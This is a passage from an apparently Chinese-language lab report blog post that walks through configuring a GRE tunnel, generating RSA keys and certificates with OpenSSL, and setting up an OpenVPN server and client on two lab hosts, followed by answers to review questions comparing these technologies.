shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# lsmod | grep gre</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120113459564.png" alt="image-20241120113459564"></p><p>图1-4</p><p>3.配置tunnel（GRE隧道）使它们互通<br><strong>vpn1创建一个GRE类型隧道设备gre1,</strong> 并设置对端IP为192.168.2.11。隧道数据包将被从192.168.1.11也就是本地IP地址发起，其TTL字段被设置为255。隧道设备分配的IP地址为10.10.10.1，掩码为255.255.255.0。<br>3.1 创建GRE类型隧道设备gre1，并验证是否添加成功</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~] ip tunnel add gre1 mode gre remote 192.168.2.11 local 192.168.1.11 ttl 255</span><br><span class="line">[root@vpn1 ~] ip a | grep gre1</span><br></pre></td></tr></table></figure><p>3.2启动gre1并分配ip地址10.10.10.1，检测是否添加并启动。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">ip <span class="built_in">link</span> <span class="built_in">set</span> gre1 up</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">ip addr add 10.10.10.1/24 dev gre1</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">ip a | grep gre1</span></span><br></pre></td></tr></table></figure><p>3.3 查看隧道状态</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120114744708.png"></p><p>嗯添加成功（看5）</p><p>3.3 <strong>vpn2创建一个GRE类型隧道设备gre1,</strong> 并设置对端IP为192.168.1.11。隧道数据包将被从192.168.2.11也就是本地IP地址发起，其TTL字段被设置为255。隧道设备分配的IP地址为10.10.10.2，掩码为255.255.255.0。<br>操作步骤如下</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">ip tunnel add gre1 mode gre remote 192.168.1.11 <span class="built_in">local</span> 192.168.2.11 ttl 255</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">ip <span class="built_in">link</span> <span class="built_in">set</span> gre1 up</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">ip addr add 10.10.10.2/24 dev gre1</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">ip a | grep gre1</span></span><br></pre></td></tr></table></figure><p>3.4测试隧道是否通</p><p>ping检测</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120114930830.png" alt="image-20241120114930830"></p><p>连接成功</p><p>4.卸载GRE模块</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">rmmod ip_gre</span></span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120115020661.png" alt="image-20241120115020661"></p><h2 id="任务二、使用加密工具OpenSSL创建加密密钥"><a href="#任务二、使用加密工具OpenSSL创建加密密钥" class="headerlink" title="任务二、使用加密工具OpenSSL创建加密密钥"></a>任务二、使用加密工具OpenSSL创建加密密钥</h2><h3 id="【任务描述】-1"><a href="#【任务描述】-1" class="headerlink" title="【任务描述】"></a>【任务描述】</h3><p>本实验主要是用来了解openssl 的使用及原理，通过本实验可以了解如何实现秘钥证书管理、对称加密和非对称加密。</p><h3 id="【实验目标】-1"><a href="#【实验目标】-1" class="headerlink" title="【实验目标】"></a>【实验目标】</h3><p>1.了解openssl加密解密原理。<br>2.掌握openssl如何生成公钥私钥，以及公私钥之间的相互转化。<br>3.掌握如何用openssl生成带密码的公钥私钥，以及之间的加密解密。<br>4.掌握如何生成带签名信息的证书。</p><h3 id="【实验工具】-2"><a href="#【实验工具】-2" class="headerlink" title="【实验工具】"></a>【实验工具】</h3><ul><li>openssl</li></ul><h3 id="【操作步骤】-1"><a href="#【操作步骤】-1" class="headerlink" title="【操作步骤】"></a>【操作步骤】</h3><p>1.查看openssl命令的基本帮助</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# openssl genrsa -</span><br><span class="line">//密钥位数，建议1024及以上</span><br><span class="line">usage: genrsa [args] [numbits]</span><br><span class="line">//生成的密钥使用des方式进行加密</span><br><span class="line"> -des            encrypt the generated key with DES in cbc mode</span><br><span class="line">//生成的密钥使用des3方式进行加密</span><br><span class="line"> -des3           encrypt the generated key with DES in ede cbc mode (168 bit key)</span><br><span class="line"> -idea           encrypt the generated key with IDEA in cbc mode</span><br><span class="line">//生成的密钥还是要seed方式进行</span><br><span class="line"> -seed           encrypt PEM output with cbc seed</span><br><span class="line">//生成的密钥使用aes方式进行加密</span><br><span class="line"> -aes128, -aes192, -aes256 encrypt PEM output with cbc aes</span><br><span class="line">//生成的密钥使用camellia方式进行加密</span><br><span class="line"> -camellia128, -camellia192, -camellia256</span><br><span class="line">                 encrypt PEM output with cbc camellia</span><br><span class="line">//生成的密钥文件，可从中提取公钥</span><br><span class="line"> -out file       output the key to &#x27;file</span><br><span class="line">//指定密钥文件的加密口令，可从文件、环境变量、终端等输入</span><br><span class="line"> -passout arg    output file pass phrase source</span><br><span class="line">//选择指数e的值，默认指定该项，e值为65537</span><br><span class="line"> -f4             use F4 (0x10001) for the E value</span><br><span class="line">//选择指数e的值，默认值为65537，使用该选项则指数指定为3</span><br><span class="line"> -3              use 3 for the E value</span><br><span class="line">//指定三方加密库或者硬件</span><br><span class="line"> -engine e       use engine e, possibly a hardware device.</span><br><span class="line">//产生随机数的种子文件</span><br><span class="line"> -rand file:file:...</span><br><span class="line">                 load the file (or the files in the directory) into</span><br><span class="line">                 the random number generator</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180301145957_95456.png" alt="img"></p><p>图2-1</p><p>2.生成私钥<br>2.1生产RSA私钥(无加密)</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# openssl genrsa -out rsa_private.key 2048</span><br><span class="line">[root@vpn1 ~]# ll rsa_private.key</span><br></pre></td></tr></table></figure><p><img src="C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20241120115610247.png" alt="image-20241120115610247"></p><p>图2-2</p><p>2.2生成rsa_private.key私钥对应的公钥</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# openssl rsa -in rsa_private.key -pubout -out rsa_public.key</span><br><span class="line">[root@vpn1 ~]# ll rsa_public.key</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120115851568.png" alt="image-20241120115851568"></p><p>图2-3</p><p>3.生成RAS含密码（使用aes256加密）公私钥</p><p># 其中 passout 代替shell 进行密码输入，否则会提示输入密码</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# openssl genrsa -aes256 -passout pass:simple -out rsa_aes_private.key 2048</span><br></pre></td></tr></table></figure><p># 生成其对应的公钥，需要输入密码，其中 pass 代替shell 进行密码输入，否则会提示输入密码；</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# openssl rsa -in rsa_aes_private.key -passin pass:simple -pubout -out rsa_aes_public.key</span><br><span class="line">[root@vpn1 ~]# ll rsa_*</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120120127132.png" alt="image-20241120120127132"></p><p>4.加密与非加密之间的转换</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">私钥转非加密</span></span><br><span class="line">openssl rsa -in rsa_aes_private.key -passin pass:simple -out rsa_private.key</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">私钥转加密</span></span><br><span class="line">openssl rsa -in rsa_private.key -aes256 -passout pass:simple -out rsa_aes_private.key</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120120331196.png" alt="image-20241120120331196"></p><p>图2-5</p><p>5.生成自签名证书</p><p># 生成 RSA 私钥和自签名证书<br># req是证书请求的子命令，-newkey rsa:2048 -keyout private_key.pem 表示生成私钥(PKCS8格式)，-nodes 表示私钥不加密，若不带参数将提示输入密码；-x509表示输出证书，-days365 为有效期，此后根据提示输入证书拥有者信息；<strong>（如果不知道输入后命令填什么，往下看）</strong></p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl req -newkey rsa:2048 -nodes -keyout rsa_private.key -x509 -days 365 -out cert.crt</span><br></pre></td></tr></table></figure><p><strong># 若执行自动输入，可使用-subj选项：</strong></p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl req -newkey rsa:2048 -nodes -keyout rsa_private.key -x509 -days 365 -out cert.crt -subj &quot;/C=CN/ST=BJ/L=BJ/O=simpleedu/OU=edu/CN=simple/emailAddress=simple@simpleedu.com&quot;</span><br></pre></td></tr></table></figure><p># 使用 已有RSA 私钥生成自签名证书<br># -new 指生成证书请求，加上-x509 表示直接输出证书，-key 指定私钥文件，其余选项与上述命令相同</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl req -new -x509 -days 365 -key rsa_private.key -out cert.crt</span><br></pre></td></tr></table></figure><p>根据提示输入相应的信息即可</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120121124422.png" alt="image-20241120121124422"></p><p>图2-6</p><p>6.生成签名请求及CA 签名</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">使用 RSA私钥生成 CSR 签名请求</span></span><br><span class="line">openssl genrsa -aes256 -passout pass:simpleedu -out server.key 2048</span><br><span class="line">openssl req -new -key server.key -out server.csr</span><br></pre></td></tr></table></figure><p>* 此时生成的 csr签名请求文件可提交至 CA进行签发 *</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120121548175.png" alt="image-20241120121548175"></p><p>图2-7</p><h2 id="任务三、SSL-VPN之OpenVPN的安装配置"><a href="#任务三、SSL-VPN之OpenVPN的安装配置" class="headerlink" title="任务三、SSL VPN之OpenVPN的安装配置"></a>任务三、SSL VPN之OpenVPN的安装配置</h2><h3 id="【任务描述】-2"><a href="#【任务描述】-2" class="headerlink" title="【任务描述】"></a>【任务描述】</h3><p>本实验任务基于真实企业网络环境，在两台台服务器搭建的典型企业局域网环境中，主要完成以下内容：<br>（1）搭建openvpn服务端与客户端。<br>（2）实现客户端可访问服务端机器</p><h3 id="【实验目标】-2"><a href="#【实验目标】-2" class="headerlink" title="【实验目标】"></a>【实验目标】</h3><p>1.了解企业级别openvpn的使用场景。<br>2.掌握企业级别openvpn搭建和使用。<br>3.掌握openvpn客户端与服务端的搭建配置。</p><h3 id="【实验工具】-3"><a href="#【实验工具】-3" class="headerlink" title="【实验工具】"></a>【实验工具】</h3><ul><li>openvpn</li></ul><h3 id="【操作步骤】-2"><a href="#【操作步骤】-2" class="headerlink" title="【操作步骤】"></a>【操作步骤】</h3><p>1.在vpn1机器安装openvpn并验证</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# yum clean all</span><br><span class="line">[root@vpn1 ~]# yum install openvpn -y</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120121712258.png" alt="image-20241120121712258"></p><p>图3-1</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# rpm -qa | grep openvpn</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120121735662.png" alt="image-20241120121735662"></p><p>图3-2</p><p>2.修改openvpn的配置文件server.conf配置文件的内容如下<br>2.1拷贝模板文件到配置文件目录下</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# cp /usr/share/doc/openvpn-2.4.4/sample/sample-config-files/server.conf /etc/openvpn/</span><br><span class="line">[root@vpn1 ~]# ls /etc/openvpn/server.conf</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120121953392.png" alt="image-20241120121953392"></p><p>图3-3</p><p>2.2 修改openvpn服务端的配置文件 &#x2F;etc&#x2F;openvpn&#x2F;server.conf</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# vim /etc/openvpn/server.conf</span><br></pre></td></tr></table></figure><p>2.2.1 <strong>指定TCP协议(使用TCP协议如果连接上VPN后网络很慢，可以更改成使用UDP协议)</strong></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180301154143_95080.png" alt="img"></p><p>图3-4</p><p>2.2.2打开这三行注释，配置DNS（实验环境无法连通外网，可不配置）</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180301154209_68494.png" alt="img"></p><p>图3-5</p><p>2.2.3 设置启动用户</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180301154236_12034.png" alt="img"></p><p>图3-6</p><p>2.2.4 注释掉 explicit-exit-notify 1</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180301154454_72855.png" alt="img"></p><p>图3-7</p><p>3.安装密钥生成软件</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# yum install easy-rsa -y</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120122314507.png" alt="image-20241120122314507"></p><p>图3-8</p><p>4.准备配置证书文件<br>4.1拷贝文件到&#x2F;etc&#x2F;openvpn</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# cp -r /usr/share/easy-rsa/ /etc/openvpn/</span><br><span class="line">[root@vpn1 ~]# ls /etc/openvpn/easy-rsa/</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120122400478.png" alt="image-20241120122400478"></p><p>图3-9</p><p>4.2配置生成证书的环境变量.并使之生效 <code>shell [root@vpn1 ~]# vim /etc/openvpn/easy-rsa/2.0/vars </code> # 现只修改如下几条，可根据自己情况进行修改 <code>shell export KEY_COUNTRY=&quot;CN&quot; export KEY_PROVINCE=&quot;BJ&quot; export KEY_CITY=&quot;BEIJING&quot; export KEY_ORG=&quot;SimpleEdu&quot; export KEY_EMAIL=&quot;simpleedu@simple.com&quot; export KEY_OU=&quot;MyOrganizationalUnit&quot; </code></p><p><strong>和刚刚那些配置对应即可</strong></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180301154601_23245.png" alt="img"></p><p>图3-10</p><p>使配置的环境变量生效 <code>shell [root@vpn1 ~]# cd /etc/openvpn/easy-rsa/2.0/ [root@vpn1 2.0]# source vars </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120122850180.png" alt="image-20241120122850180"></p><p>图3-11</p><p>4.3 根据提示先删除所有，再根据自己情况进行修改（默认回车即可） <code>shell [root@vpn1 2.0]# cd /etc/openvpn/easy-rsa/2.0/ [root@vpn1 2.0]# source vars NOTE: If you run ./clean-all, I will be doing a rm -rf on /etc/openvpn/easy-rsa/2.0/keys [root@vpn1 2.0]# ./clean-all [root@vpn1 2.0]# ./build-ca </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120123158852.png" alt="image-20241120123158852"></p><p>图3-12</p><p>5.建服务端的证书 创建通用名(common name)为”server”的证书文件,交互输入自己的值,回车键进行，在提示输入密码的地方，设置一个密码如<strong>simple123</strong> <code>shell [root@vpn1 2.0]# ./build-key-server server </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180301154735_41912.png" alt="img"></p><p>图3-13</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120123301904.png" alt="image-20241120123301904"></p><p>图3-14</p><p><strong>生成防攻击的key文件（防DDos攻击、UDP淹没等恶意攻击）</strong> <code>shell [root@vpn1 2.0]# openvpn --genkey --secret keys/ta.key [root@vpn1 2.0]# ll keys/ta.key </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120123358006.png" alt="image-20241120123358006"></p><p>图3-15</p><p>6.建客户端证书 6.1.创建密钥文件，耗时间一分钟左右 <code>shell [root@vpn1 2.0]# ./build-dh </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120131539146.png" alt="image-20241120131539146"></p><p>图3-16</p><p>可以看到有一个dh2048.pem的文件产生</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120131650389.png" alt="image-20241120131650389"></p><p>图3-17</p><p>6.2拷贝密钥认证文件到配置文件目录下 <code>shell [root@vpn1 2.0]# cd /etc/openvpn/easy-rsa/2.0/keys/ [root@vpn1 keys]# cp dh2048.pem ca.crt server.crt server.key ta.key /etc/openvpn </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120131844822.png" alt="image-20241120131844822"></p><p>图3-18</p><p>6.3创建一个通用名(common name)为 client的客户端证书，交互输入自己的值,默认回车键进行 <code>shell [root@vpn1 keys]# cd .. [root@vpn1 2.0]# ./build-key client [root@vpn1 2.0]# ll keys/client.* </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180301154923_53787.png" alt="img"></p><p>图3-19</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120132117071.png" alt="image-20241120132117071"></p><p>图3-20</p><p>7.启动并检查 7.1 启动openvpn服务并设置为开机自启动</p><p># 启动openvpn服务</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# systemctl start openvpn@server.service</span><br></pre></td></tr></table></figure><p># 设置开机自启动</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# systemctl enable openvpn@server.service</span><br></pre></td></tr></table></figure><p># 查看状态</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# systemctl status openvpn@server.service</span><br></pre></td></tr></table></figure><p># 检查是否启动</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# netstat -lntup | grep openvpn</span><br></pre></td></tr></table></figure><p># 如下所示表示正常启动</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tcp        0      0 0.0.0.0:1194            0.0.0.0:*               LISTEN      8870/openvpn</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120132559904.png" alt="image-20241120132559904"></p><p>图3-21</p><p>8.客户端（vpn2）登录测试 8.1 在客户端安装openvpn <code>shell [root@vpn2 ~]# yum install openvpn -y </code> 8.2 在vpn1端把生产文件拷贝到客户端 <code>shell [root@vpn1 keys]# cd /etc/openvpn/easy-rsa/2.0/keys/ </code> # 密码为Simplexue123 <code>shell [root@vpn1 keys]# scp ca.crt client.crt client.key ta.key 192.168.2.11:/etc/openvpn/client/ </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120141932239.png" alt="image-20241120141932239"></p><p>图3-22</p><p>8.3 编辑客户端配置文件 <code>shell [root@vpn2 ~]# vim /etc/openvpn/client/client.conf client dev tun proto tcp remote 192.168.1.11 1194 resolv-retry infinite nobind persist-key persist-tun ca /etc/openvpn/client/ca.crt cert /etc/openvpn/client/client.crt key /etc/openvpn/client/client.key tls-auth /etc/openvpn/client/ta.key 1 cipher AES-256-CBC verb 3 mute 20 </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120142221594.png" alt="image-20241120142221594"></p><p>图3-23</p><p>8.4 启动openvpn客户端并挂后台运行，并可实时查看其日志。 <code>shell [root@vpn2 client]# cd /etc/openvpn/client/ [root@vpn2 client]# openvpn /etc/openvpn/client/client.conf &amp; </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120142305023.png" alt="image-20241120142305023"></p><p>图3-24</p><p>8.5 查看网卡信息，得知已获取到ip <code>shell [root@vpn2 ~]# ip addr show tun0 </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120142700800.png" alt="image-20241120142700800"></p><p>图3-25</p><p>8.6 测试是否可使用 <code>shell [root@vpn2 client]# ping 10.8.0.1 </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120142723774.png" alt="image-20241120142723774"></p><p>图3-26</p><p>8.7 openvpn nat配置 <code>shell [root@vpn1 ~]# iptables -t nat -A POSTROUTING -s 10.8.0.1/24 -j MASQUERADE </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120142829634.png" alt="image-20241120142829634"></p><p>图3-27</p><p>在vpn2上测试 <code>shell [root@vpn2 ~]# ping -c 1 www.baidu.com </code></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180301154349_99170.png" alt="img"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120142941102.png" alt="image-20241120142941102"></p><p>图3-28</p><p>注：<strong>实验环境不能外网， 访问百度只是为了验证策略 vpn1上验证策略（哭了，差点以为坏了</strong></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180301154320_69674.png" alt="img"></p><p>图3-29</p><p>8.8 关闭服务 <code>shell [root@vpn1 ~]# pkill openvpn [root@vpn2 ~]# pkill openvpn </code></p><h2 id="思考题"><a href="#思考题" class="headerlink" title="思考题"></a>思考题</h2><h3 id="1-简述GRE-VPN的作用和特点"><a href="#1-简述GRE-VPN的作用和特点" class="headerlink" title="(1) 简述GRE VPN的作用和特点"></a>(1) <strong>简述GRE VPN的作用和特点</strong></h3><p><strong>作用</strong>： GRE（Generic Routing Encapsulation）VPN 是一种隧道协议，用于在公共网络（如互联网）上建立点对点的虚拟专用网络（VPN）。GRE VPN可以封装任意类型的网络协议数据包（如IPv4、IPv6等），并通过隧道将这些数据包从一端传输到另一端。它常用于跨网络、跨地域的连接，可以帮助实现不同网络之间的通信。</p><p><strong>特点</strong>：</p><ul><li><strong>简单性</strong>：GRE协议非常简单，它通过封装原始数据包的方式传输数据，不做加密、压缩或其他复杂操作。</li><li><strong>支持多种协议</strong>：GRE VPN能够封装几乎所有类型的协议，适合多种网络协议之间的通信。</li><li><strong>无加密</strong>：GRE本身不提供加密功能，因此通常需要与其他技术（如IPsec）结合使用，以确保数据安全。</li><li><strong>点对点连接</strong>：GRE VPN是基于点对点连接的，适用于两点间的虚拟专用网络。</li><li><strong>可扩展性</strong>：GRE允许通过多个隧道将不同地点的网络连接起来，可以支持广泛的网络拓扑结构。</li></ul><h3 id="2-简述OpenSSL中使用的核心密码算法"><a href="#2-简述OpenSSL中使用的核心密码算法" class="headerlink" title="(2) 简述OpenSSL中使用的核心密码算法"></a>(2) <strong>简述OpenSSL中使用的核心密码算法</strong></h3><p>OpenSSL是一个广泛使用的开源加密库，支持各种加密算法，用于实现安全通信。其核心密码算法包括：</p><ol><li><strong>对称加密算法</strong>：<ul><li><strong>AES（Advanced Encryption Standard）</strong>：广泛使用的对称加密算法，具有128、192、256位密钥长度，提供高安全性和性能。</li><li><strong>DES（Data Encryption Standard）</strong>：一种较旧的对称加密算法，已不再推荐使用，密钥长度为56位。</li><li><strong>3DES（Triple DES）</strong>：DES的三重加密版本，比DES更安全，但性能较低。</li></ul></li><li><strong>非对称加密算法</strong>：<ul><li><strong>RSA</strong>：基于大数因数分解问题，广泛应用于数字签名和密钥交换中。</li><li><strong>DSA（Digital Signature Algorithm）</strong>：用于数字签名的算法，与RSA类似，但主要用于签名而非加密。</li></ul></li><li><strong>哈希算法</strong>：<ul><li><strong>SHA（Secure Hash Algorithm）</strong>：如SHA-1、SHA-256、SHA-512等，用于生成固定长度的散列值，保证数据的完整性。</li><li><strong>MD5</strong>：一种较旧的哈希算法，因碰撞漏洞不再推荐用于安全场景。</li></ul></li><li><strong>密钥交换算法</strong>：<ul><li><strong>Diffie-Hellman（DH）</strong>：用于安全的密钥交换算法，允许两方在不直接交换密钥的情况下生成共享密钥。</li></ul></li><li><strong>数字签名算法</strong>：<ul><li><strong>ECDSA（Elliptic Curve Digital Signature Algorithm）</strong>：基于椭圆曲线的数字签名算法，提供较小密钥尺寸的高安全性。</li></ul></li></ol><p>OpenSSL通过这些算法实现数据的加密、解密、签名验证、完整性校验等安全功能，确保通信过程中的机密性、完整性和认证性。</p><h3 id="3-简述GRE-VPN和OpenVPN的区别"><a href="#3-简述GRE-VPN和OpenVPN的区别" class="headerlink" title="(3) 简述GRE VPN和OpenVPN的区别"></a>(3) <strong>简述GRE VPN和OpenVPN的区别</strong></h3><p><strong>GRE VPN和OpenVPN的主要区别</strong>：</p><ol><li><strong>协议基础</strong>：<ul><li><strong>GRE VPN</strong>：基于GRE协议，是一种隧道协议，主要用于封装和传输数据包，并不提供加密和身份验证功能。它可以与其他协议（如IPsec）结合，增加安全性。</li><li><strong>OpenVPN</strong>：基于SSL&#x2F;TLS协议，通常用于通过加密和身份验证创建安全的点对点连接，内置了强大的加密机制和身份认证方式。</li></ul></li><li><strong>安全性</strong>：<ul><li><strong>GRE VPN</strong>：GRE本身不提供任何加密或身份认证功能。需要与IPsec等其他技术结合来提供安全性。</li><li><strong>OpenVPN</strong>：<strong>自带加密和认证功能，支持强大的SSL&#x2F;TLS加密，能够确保数据的机密性和完整性。</strong></li></ul></li><li><strong>灵活性和兼容性</strong>：<ul><li><strong>GRE VPN</strong>：GRE协议主要封装IP包，能够支持不同类型的协议，具有较强的灵活性，适合不同网络间的通信。但由于它没有内建加密，通常用于封装不需要加密的数据流。</li><li><strong>OpenVPN</strong>：OpenVPN主要使用TLS&#x2F;SSL协议，适合需要高度安全性和身份认证的场景，支持多种加密算法和协议，能够穿透NAT（网络地址转换）防火墙。</li></ul></li><li><strong>性能和复杂性</strong>：<ul><li><strong>GRE VPN</strong>：<strong>由于其本身较为简单，性能较高，</strong>适用于不需要加密的场景。</li><li><strong>OpenVPN</strong>：由于内建加密和身份验证，处理过程复杂，可能会稍微降低性能，但提供了更强的安全性。</li></ul></li><li><strong>使用场景</strong>：<ul><li><strong>GRE VPN</strong>：适合于跨网络、跨地域的连接，需要支持多种协议封装和灵活的网络拓扑结构，通常与IPsec一起使用以确保安全性。</li><li><strong>OpenVPN</strong>：适合需要高安全性、穿透防火墙或NAT的VPN场景，尤其适用于远程办公、跨平台连接等场景。</li></ul></li></ol><p>总的来说，<strong>GRE VPN主要侧重于协议封装和数据传输，而OpenVPN则侧重于提供加密、身份认证和安全连接</strong>，因此在使用时，选择哪种方案取决于具体的安全要求和网络架构。</p>]]></content>
    
    
      
      
